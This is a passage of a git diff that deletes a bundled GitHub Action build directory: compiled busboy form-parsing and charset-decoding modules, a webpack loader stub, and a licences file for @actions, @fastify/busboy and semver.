eslint-disable-line no-var - if (Array.isArray(parsedConType[i]) && - RE_CHARSET.test(parsedConType[i][0])) { - charset = parsedConType[i][1].toLowerCase() - break - } - } - - if (charset === undefined) { charset = cfg.defCharset || 
'utf8' } - - this.decoder = new Decoder() - this.charset = charset - this._fields = 0 - this._state = 'key' - this._checkingBytes = true - this._bytesKey = 0 - this._bytesVal = 0 - this._key = '' - this._val = '' - this._keyTrunc = false - this._valTrunc = false - this._hitLimit = false -} - -UrlEncoded.prototype.write = function (data, cb) { - if (this._fields === this.fieldsLimit) { - if (!this.boy.hitFieldsLimit) { - this.boy.hitFieldsLimit = true - this.boy.emit('fieldsLimit') - } - return cb() - } - - let idxeq; let idxamp; let i; let p = 0; const len = data.length - - while (p < len) { - if (this._state === 'key') { - idxeq = idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x3D/* = */) { - idxeq = i - break - } else if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesKey } - } - - if (idxeq !== undefined) { - // key with assignment - if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } - this._state = 'val' - - this._hitLimit = false - this._checkingBytes = true - this._val = '' - this._bytesVal = 0 - this._valTrunc = false - this.decoder.reset() - - p = idxeq + 1 - } else if (idxamp !== undefined) { - // key with no assignment - ++this._fields - let key; const keyTrunc = this._keyTrunc - if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - if (key.length) { - this.boy.emit('field', decodeText(key, 'binary', this.charset), - '', - keyTrunc, - false) - } - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if 
there are encoded bytes... - if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._keyTrunc = true - } - } else { - if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } - p = len - } - } else { - idxamp = undefined - for (i = p; i < len; ++i) { - if (!this._checkingBytes) { ++p } - if (data[i] === 0x26/* & */) { - idxamp = i - break - } - if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { - this._hitLimit = true - break - } else if (this._checkingBytes) { ++this._bytesVal } - } - - if (idxamp !== undefined) { - ++this._fields - if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - this._state = 'key' - - this._hitLimit = false - this._checkingBytes = true - this._key = '' - this._bytesKey = 0 - this._keyTrunc = false - this.decoder.reset() - - p = idxamp + 1 - if (this._fields === this.fieldsLimit) { return cb() } - } else if (this._hitLimit) { - // we may not have hit the actual limit if there are encoded bytes... 
- if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } - p = i - if ((this._val === '' && this.fieldSizeLimit === 0) || - (this._bytesVal = this._val.length) === this.fieldSizeLimit) { - // yep, we actually did hit the limit - this._checkingBytes = false - this._valTrunc = true - } - } else { - if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } - p = len - } - } - } - cb() -} - -UrlEncoded.prototype.end = function () { - if (this.boy._done) { return } - - if (this._state === 'key' && this._key.length > 0) { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - '', - this._keyTrunc, - false) - } else if (this._state === 'val') { - this.boy.emit('field', decodeText(this._key, 'binary', this.charset), - decodeText(this._val, 'binary', this.charset), - this._keyTrunc, - this._valTrunc) - } - this.boy._done = true - this.boy.emit('finish') -} - -module.exports = UrlEncoded - - -/***/ }), - -/***/ 7100: -/***/ ((module) => { - -"use strict"; - - -const RE_PLUS = /\+/g - -const HEX = [ - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -] - -function Decoder () { - this.buffer = undefined -} -Decoder.prototype.write = function (str) { - // Replace '+' with ' ' before decoding - str = str.replace(RE_PLUS, ' ') - let res = '' - let i = 0; let p = 0; const len = str.length - for (; i < len; ++i) { - if (this.buffer !== undefined) { - if (!HEX[str.charCodeAt(i)]) { - res += '%' + this.buffer - this.buffer = undefined - --i // retry character - } else { - this.buffer += str[i] - ++p - if (this.buffer.length === 2) { - res += String.fromCharCode(parseInt(this.buffer, 
16)) - this.buffer = undefined - } - } - } else if (str[i] === '%') { - if (i > p) { - res += str.substring(p, i) - p = i - } - this.buffer = '' - ++p - } - } - if (p < len && this.buffer === undefined) { res += str.substring(p) } - return res -} -Decoder.prototype.reset = function () { - this.buffer = undefined -} - -module.exports = Decoder - - -/***/ }), - -/***/ 8647: -/***/ ((module) => { - -"use strict"; - - -module.exports = function basename (path) { - if (typeof path !== 'string') { return '' } - for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var - switch (path.charCodeAt(i)) { - case 0x2F: // '/' - case 0x5C: // '\' - path = path.slice(i + 1) - return (path === '..' || path === '.' ? '' : path) - } - } - return (path === '..' || path === '.' ? '' : path) -} - - -/***/ }), - -/***/ 4619: -/***/ (function(module) { - -"use strict"; - - -// Node has always utf-8 -const utf8Decoder = new TextDecoder('utf-8') -const textDecoders = new Map([ - ['utf-8', utf8Decoder], - ['utf8', utf8Decoder] -]) - -function getDecoder (charset) { - let lc - while (true) { - switch (charset) { - case 'utf-8': - case 'utf8': - return decoders.utf8 - case 'latin1': - case 'ascii': // TODO: Make these a separate, strict decoder? 
- case 'us-ascii': - case 'iso-8859-1': - case 'iso8859-1': - case 'iso88591': - case 'iso_8859-1': - case 'windows-1252': - case 'iso_8859-1:1987': - case 'cp1252': - case 'x-cp1252': - return decoders.latin1 - case 'utf16le': - case 'utf-16le': - case 'ucs2': - case 'ucs-2': - return decoders.utf16le - case 'base64': - return decoders.base64 - default: - if (lc === undefined) { - lc = true - charset = charset.toLowerCase() - continue - } - return decoders.other.bind(charset) - } - } -} - -const decoders = { - utf8: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.utf8Slice(0, data.length) - }, - - latin1: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - return data - } - return data.latin1Slice(0, data.length) - }, - - utf16le: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.ucs2Slice(0, data.length) - }, - - base64: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - return data.base64Slice(0, data.length) - }, - - other: (data, sourceEncoding) => { - if (data.length === 0) { - return '' - } - if (typeof data === 'string') { - data = Buffer.from(data, sourceEncoding) - } - - if (textDecoders.has(this.toString())) { - try { - return textDecoders.get(this).decode(data) - } catch (e) { } - } - return typeof data === 'string' - ? 
data - : data.toString() - } -} - -function decodeText (text, sourceEncoding, destEncoding) { - if (text) { - return getDecoder(destEncoding)(text, sourceEncoding) - } - return text -} - -module.exports = decodeText - - -/***/ }), - -/***/ 1467: -/***/ ((module) => { - -"use strict"; - - -module.exports = function getLimit (limits, name, defaultLimit) { - if ( - !limits || - limits[name] === undefined || - limits[name] === null - ) { return defaultLimit } - - if ( - typeof limits[name] !== 'number' || - isNaN(limits[name]) - ) { throw new TypeError('Limit ' + name + ' is not a valid number') } - - return limits[name] -} - - -/***/ }), - -/***/ 1854: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* eslint-disable object-property-newline */ - - -const decodeText = __nccwpck_require__(4619) - -const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g - -const EncodedLookup = { - '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', - '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', - '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', - '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', - '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', - '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', - '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', - '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', - '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', - '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', - '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', - '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', - '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', - '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', - 
'%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', - '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', - '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', - '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', - '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', - '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', - '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', - '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', - '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', - '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', - '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', - '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', - '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', - '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', - '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', - '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', - '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', - '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', - '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', - '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', - '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', - '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', - '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', - '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', - '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', - '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', 
- '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', - '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', - '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', - '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', - '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', - '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', - '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', - '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', - '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', - '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', - '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', - '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', - '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', - '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', - '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', - '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', - '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', - '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', - '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', - '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', - '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', - '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', - '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', - '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', - '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', - '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': 
'\xca', - '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', - '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', - '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', - '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', - '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', - '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', - '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', - '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', - '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', - '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', - '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', - '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', - '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', - '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', - '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', - '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', - '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', - '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', - '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', - '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', - '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', - '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', - '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', - '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', - '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', - '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', 
'%F9': '\xf9', - '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', - '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', - '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', - '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', - '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' -} - -function encodedReplacer (match) { - return EncodedLookup[match] -} - -const STATE_KEY = 0 -const STATE_VALUE = 1 -const STATE_CHARSET = 2 -const STATE_LANG = 3 - -function parseParams (str) { - const res = [] - let state = STATE_KEY - let charset = '' - let inquote = false - let escaping = false - let p = 0 - let tmp = '' - const len = str.length - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - const char = str[i] - if (char === '\\' && inquote) { - if (escaping) { escaping = false } else { - escaping = true - continue - } - } else if (char === '"') { - if (!escaping) { - if (inquote) { - inquote = false - state = STATE_KEY - } else { inquote = true } - continue - } else { escaping = false } - } else { - if (escaping && inquote) { tmp += '\\' } - escaping = false - if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { - if (state === STATE_CHARSET) { - state = STATE_LANG - charset = tmp.substring(1) - } else { state = STATE_VALUE } - tmp = '' - continue - } else if (state === STATE_KEY && - (char === '*' || char === '=') && - res.length) { - state = char === '*' - ? 
STATE_CHARSET - : STATE_VALUE - res[p] = [tmp, undefined] - tmp = '' - continue - } else if (!inquote && char === ';') { - state = STATE_KEY - if (charset) { - if (tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } - charset = '' - } else if (tmp.length) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } - tmp = '' - ++p - continue - } else if (!inquote && (char === ' ' || char === '\t')) { continue } - } - tmp += char - } - if (charset && tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } else if (tmp) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - - if (res[p] === undefined) { - if (tmp) { res[p] = tmp } - } else { res[p][1] = tmp } - - return res -} - -module.exports = parseParams - - -/***/ }) - -/******/ }); -/************************************************************************/ -/******/ // The module cache -/******/ var __webpack_module_cache__ = {}; -/******/ -/******/ // The require function -/******/ function __nccwpck_require__(moduleId) { -/******/ // Check if module is in cache -/******/ var cachedModule = __webpack_module_cache__[moduleId]; -/******/ if (cachedModule !== undefined) { -/******/ return cachedModule.exports; -/******/ } -/******/ // Create a new module (and put it into the cache) -/******/ var module = __webpack_module_cache__[moduleId] = { -/******/ // no module.id needed -/******/ // no module.loaded needed -/******/ exports: {} -/******/ }; -/******/ -/******/ // Execute the module function -/******/ var threw = true; -/******/ try { -/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); -/******/ threw = false; -/******/ } finally { -/******/ if(threw) delete __webpack_module_cache__[moduleId]; -/******/ } -/******/ -/******/ // Return the exports of the module -/******/ return module.exports; -/******/ } 
-/******/ -/************************************************************************/ -/******/ /* webpack/runtime/compat */ -/******/ -/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; -/******/ -/************************************************************************/ -/******/ -/******/ // startup -/******/ // Load entry module and return exports -/******/ // This entry module is referenced by other modules so it can't be inlined -/******/ var __webpack_exports__ = __nccwpck_require__(6144); -/******/ module.exports = __webpack_exports__; -/******/ -/******/ })() -; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt deleted file mode 100644 index cd36a2d85eff..000000000000 --- a/.github/action/dist/licenses.txt +++ /dev/null 
@@ -1,175 +0,0 @@ -@actions/core -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/exec -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/http-client -MIT -Actions Http Client for Node.js - -Copyright (c) GitHub, Inc. - -All rights reserved. - -MIT License - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and -associated documentation files (the "Software"), to deal in the Software without restriction, -including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT -LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN -NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
- - -@actions/io -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/tool-cache -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@fastify/busboy -MIT -Copyright Brian White. All rights reserved. - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to -deal in the Software without restriction, including without limitation the -rights to use, copy, modify, merge, publish, distribute, sublicense, and/or -sell copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS -IN THE SOFTWARE. - -semver -ISC -The ISC License - -Copyright (c) Isaac Z. Schlueter and Contributors - -Permission to use, copy, modify, and/or distribute this software for any -purpose with or without fee is hereby granted, provided that the above -copyright notice and this permission notice appear in all copies. - -THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS. 
